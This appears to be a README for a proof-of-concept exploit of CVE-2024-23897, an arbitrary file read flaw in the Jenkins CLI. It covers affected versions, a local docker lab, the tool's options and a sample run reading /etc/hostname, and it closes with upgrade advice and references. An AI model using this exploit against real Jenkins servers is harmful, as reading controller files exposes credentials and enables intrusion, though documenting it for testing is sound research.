A proof-of-concept (PoC) for CVE-2024-23897, an arbitrary file read vulnerability in Jenkins' built-in command line interface (CLI). It allows unauthenticated attackers with Overall/Read permission to read arbitrary files on the Jenkins controller file system.
Affected Versions
- Jenkins versions <= 2.441
- Jenkins LTS versions <= 2.426.2
Spin up a local vulnerable instance using docker compose:
cd docker
docker compose up -dThe instance will be available at http://localhost:1234
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]
Jenkins CVE-2024-23897 file-read PoC
options:
-h, --help show this help message and exit
--url URL URL for Jenkins instance (default: http://localhost:1234)
--file FILE File to read (default: /etc/hostname)
--method {1,2,3} The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)Example
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...
ERROR: No such agent "jenkins_vuln_instance" exists.
[i] Upload request done
[i] All threads completedThe script may have issues reading larger files due to concurrency and connection timeouts. For more technical details and a walkthrough of the vulnerability take at a look at my blog post on the topic.
- Upgrade to Jenkins 2.442 or LTS 2.426.3
- Apply temporary workarounds as described in the Jenkins security advisory.
- Sonar Source | Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins
- Jenkins Security Advisory - 2024-01-24
- Qualys ThreatPROTECT | Jenkins Core Remote Code Execution Vulnerability (CVE-2024-23897)
- CVE-2024-23897: Assessing the Impact of the Jenkins Arbitrary File Leak Vulnerability – Horizon3.ai